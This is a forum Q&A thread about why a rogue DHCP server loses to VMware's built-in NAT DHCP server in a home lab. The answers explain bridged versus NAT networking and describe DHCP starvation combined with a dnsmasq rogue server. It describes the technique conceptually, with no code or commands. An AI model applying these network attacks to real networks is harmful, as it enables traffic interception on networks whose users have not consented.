Is DHCP spoofing ever possible on VMware?

Question

So I've just watched this Defcon video:https://www.youtube.com/watch?v=RaA5dEIqzzQ&t=1583s. Apparently they were able to set up a rouge DHCP server and get a 50/50 chance of sending the victim the DHCP offer before the legitimate DHCP server. However, when I tried this in vmware, my success rate was down to a 0%. The default legitimate DHCP server from the NAT config of Vmware always responds to the client first before my rouge DHCP. This makes me wonder if it is just the setup of VMware that allows the default DHCP server to respond immediately. If that is the case, how do you get a rouge DHCP to respond faster in a virtual environment since there is no concept of "physical distance"?

Answer 1

Short answer is no, you can't.

If your vm network adapter is NAT, your rogue DHCP server is only on natted network. To test if machines from your host's network are taking ip from your rogue DHCP server, your vm's network should be bridge.

With your current configuration using NAT on your vm, you are going to be able to get ip from your rogue DHCP only from other devices/hosts inside that network and being different than a vm created on same Vmware host. This is because is Vmware is who manages it so its own DHCP is going to have priority always... so you can't get ip from other vm even "natted" created on the same Vmware host.

To get an ip from your vm rogue DHCP you must create some kind of special environment. For example:

If you create a vm on your NAT network which has already a Vmware and inside you create a vm with bridge network mode... that vm inside the vm for sure can take ip from your rogue DHCP with 50% of possibilities.

Answer 2

I have realized recently that I am still able to carry out the rogue attack by first performing a DHCP starvation attack against the legitimate VMWare DHCP server. Then, new clients will start accepting my Rogue DHCP responses as the legitimate one is no longer able to respond due to lack of slots for IP addresses. Of course, this only works if my Rogue DHCP server is also a VM inside the same NAT network, which I set up with dnsmasq.